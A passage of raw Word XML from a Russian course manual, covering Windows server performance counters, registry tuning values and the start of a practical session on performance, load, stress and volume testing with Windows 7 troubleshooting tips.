              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>InitWorkItems</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (число элементов рабочей очереди, выделенных процессору во время запуска системы) или </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>MaxWorkItems</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (максимальное число буферов приема, которые могут быть выделены сервером) в реестр (в раздел HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Lanm</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">anServer\Parameters). Запись </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>InitWorkItems</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> может принимать значение в диапазоне от 1 до 512, а запись </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>MaxWorkItems</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> — от 1 до 65535. Начните с любого значения для </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>InitWorkItems</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> и значения 4096 для </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>MaxWorkItems</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>, а затем удваивайте эти значения до тех пор, пока предел счетчика «Сервер\Нехваток рабочих элементов» остается ниже 3. Сведения по изменению реестра см. в справочном файле Редактор реестра.</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lastRenderedPageBreak/>
              <w:t>Сервер</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Сервер \ Выгружаемый пул (пик)</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Объем физической оперативной памяти</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Это значение определяет максимальный размер файла подкачки и показывает объем физической памяти.</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Сервер</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Рабочие очереди сервера \ Длина очереди</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4</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 xml:space="preserve">Если значение достигает данного порога, возможно, производительность системы ограничивается процессором. Это счетчик мгновенных значений; возьмите несколько значений, полученных в разные моменты времени. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidTr="00BD2CDB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1460"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Несколько процессоров</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2636"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Система \ Длина очереди процессора</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3858" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BD2CDB" w:rsidRPr="00617AC0" w:rsidRDefault="00BD2CDB" w:rsidP="000D4B3A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Это счетчик мгновенных значений; возьмите несколько значений, полученных в разные моменты времени.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc507788536"/>
      <w:bookmarkStart w:id="136" w:name="_Toc507788261"/>
      <w:bookmarkStart w:id="137" w:name="_Toc26278732"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № 13 </w:t>
      </w:r>
      <w:r w:rsidR="00B108F3" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Решение </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>проблем производительности программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
      <w:bookmarkEnd w:id="136"/>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> научиться выявлять и решашь проблемы производительности программного обеспечения отраслевой направленности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">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DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся рекомендации по установке и примерный текст консультации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</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b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Решение проблем производительности программного обеспечения</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Современный этап развития многопользовательских программных средств ставит перед разработчиками сложный комплекс задач по обеспечению требуемого уровня производительности создаваемого программного обеспечения. Показатели производительности не только выступают как самостоятельный критерий качества, но и значительно влияют на показатели стабильности, отказоустойчивости, безопасности и живучести программных средств. </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Специфика предметной области не позволяет в полной мере использовать классические подходы к обеспечению качества с применением ручного функционального тестирования, что приводит к необходимости поиска новых эффективных решений.</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Одним из таких решений является автоматизация тестирования производительности – применение технологий и специального программного обеспечения, позволяющего создать в искусственной среде условия, в необходимой мере имитирующие реальные ситуации, в которых могут проявиться дефекты программного средства, связанные с его производительностью.</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b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Виды тестирования производительности</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В настоящий момент наиболее исследованными направлениями тестирования, затрагивающими показатели производительности программных средств, являются:</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тестирование производительности (performance testing) – исследование показателей скорости реакции приложения на внешние воздействия при различной по характеру и интенсивности нагрузке;</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 нагрузочное тестирование (load testing) – исследование способности приложения сохранять заданные показатели качества при нагрузке в допустимых пределах и некотором превышении этих пределов (определение </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>запаса прочности</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>);</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стрессовое тестирование (stress testing) – исследование поведения приложения при нештатных изменениях нагрузки, значительно превышающих расчетный уровень;</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объемное тестирование (volume testing) – исследование производительности приложения при обработке различных (как правило, больших) объемов данных.</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Цели различных видов тестирования производительности</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2321"/>
        <w:gridCol w:w="7533"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidTr="001B566C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1970" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:ind w:firstLine="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Тестирование производительности</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7646" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="008634D0">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:ind w:firstLine="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>оценка времени выполнения операций при определенной интенсивности и очередности выполнения этих операций; оценка реакции на изменение количества пользователей, одновременно работающих с приложением; оценка границ интенсивности нагрузки, при которых производительность выходит за рамки приемлемой; оценка показателей масштабируемости приложения.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidTr="001B566C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1970" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:ind w:firstLine="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Нагрузочное тестирование</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7646" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="008634D0">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:ind w:firstLine="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>оценка скорости реакции приложения на различные значения нагрузки в допустимых пределах;  оценка использования приложением системных ресурсов при различных значениях нагрузки; оценка изменения со временем поведения приложения при сохранении допустимой нагрузки длительное время.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidTr="001B566C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1970" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:ind w:firstLine="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Стрессовое тестирование</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7646" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:ind w:firstLine="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">оценка реакции приложения на нестандартные и стрессовые случаи изменения нагрузки, в т.ч.: резкое непредсказуемое изменение интенсивности нагрузки, значительное превышение предельно допустимой нагрузки, интенсивное использование функций приложения, являющихся </w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>узким местом</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> в производительности.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidTr="001B566C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1970" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:ind w:firstLine="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Объемное тестирование</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7646" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:ind w:firstLine="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>оценка показателей производительности приложения в случаях приема, обработки и генерации данных различного объема и с различными показателями вычислительной сложности обработки; оценка способности приложения обрабатывать большие объемы данных в условиях высокой загрузки системных вычислительных ресурсов; оценка способности приложения обрабатывать большие объемы данных при недостатке оперативной памяти.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Анализ данных, представленных в таблице, позволяет сделать вывод о том, что прямыми или косвенными целями любого тестирования, так или иначе затрагивающего вопросы производительности, является:</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определение </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>узких мест</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> системы (функций программно-аппаратного комплекса, обращение к которым приводит к наибольшему падению показателей производительности);</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определение лучшей архитектуры системы, выбор наилучшей платформы, средств и языков реализации;</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определение оптимального способа хранения файлов;</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оценка и оптимизация схемы базы данных в контексте повышения производительности;</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оценка максимальной и минимальной производительности системы и условий их достижения;</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определение характера увеличения времени отклика системы при увеличении нагрузки;</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определение максимального числа одновременно работающих пользователей, превышение которого делает использование системы невозможным;</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определение влияния конфигурации системы на производительность;</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оценка показателей масштабируемости системы;</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оценка соответствия сетевой инфраструктуры требованиям производительности.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Если вы столкнулись с плохой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>производительностью Wondows 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, система довольно часто зависает, или, может быть, не отвечает программа, и так далее, то вы можете попробовать некоторые из моих предложений и рекомендаций, которые могут помочь вам решить эти вопросы.</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b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выборочный запуск:</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Большую часть времени службы запуска могут привести к проблемам, которые влияют на производительность системы. Чистая загрузка может решить проблему службы, которая вызывает проблему. Чтобы определить это, мы можем использовать </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>программу настройки системы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> , чтобы найти ее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="008634D0" w:rsidP="00DF11FF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Первое</w:t>
      </w:r>
      <w:r w:rsidR="00DF11FF" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, что нужно сделать – всегда создавать точки восстановления системы!</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В меню Пуск в поле поиск введите MSCONFIG и нажмите Enter.</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2095500" cy="1497330"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="99" name="Рисунок 23" descr="http://kompkimi.ru/wp-content/uploads/2012/03/MSCONFIG1.pn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kompkimi.ru/wp-content/uploads/2012/03/MSCONFIG1.png">
                      <a:hlinkClick r:id="rId271"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId272" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2095500" cy="1497330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
